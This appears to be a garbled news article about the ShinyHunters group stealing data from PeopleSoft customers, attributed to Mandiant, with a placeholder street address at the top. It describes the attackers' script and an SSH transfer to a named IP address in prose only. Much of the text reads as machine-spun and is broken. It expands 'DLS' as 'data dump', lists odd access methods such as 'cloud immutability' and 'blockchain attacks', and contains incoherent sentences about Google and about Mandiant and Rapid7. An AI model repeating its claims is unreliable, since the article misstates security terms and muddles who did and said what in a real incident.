Physical Address
304 North Cardinal St.
Dorchester Center, MA 02124
“While a number of organizations successfully blocked the operation or fixed the vulnerabilities, others encountered a problem, resulting in stolen data being published on the ShinyHunters DLS,” Mandiant said. (DLS is short for data dump.)
An examination of the bash script left at the site shows the attackers also identified compromised entities, including PeopleSoft mapping, policy view, and WebLogic server XML configuration. After that, the attackers established an SSH connection to 176.120.22.24, the IP address of ShinyHunters’ DLS. The extracted data was first compressed using the zstd tool. DLS said it recovered 48GB of data from one victim.
A slightly modified version of ShinyHunters’ DLS.
Credit: Mandiant
A slightly modified version of ShinyHunters’ DLS.
Credit: Mandiant
ShinyHunters has been operating since 2019. Over the past few years, it has carried out numerous hacks against major companies around the world, affecting millions of people downstream. A small sample of those affected include Ticketmaster (through the Snowflake breach, which stored data), Spain’s largest bank, Santander, and Salesforce (and, through this, Google is, he saysmany other companies). ShinyHunters use a variety of methods to gain access to startups, including exploiting cloud immutability and software vulnerabilities, OAuth token theft, blockchain attacks, cryptography, and other types of techniques.
Mandiant is Rapid7 they are giving signs of disagreement. They are also advising PeopleSoft customers on what they need to do immediately. Thanks to the success of ShinyHunters, all PeopleSoft users would do well to listen to those calls.
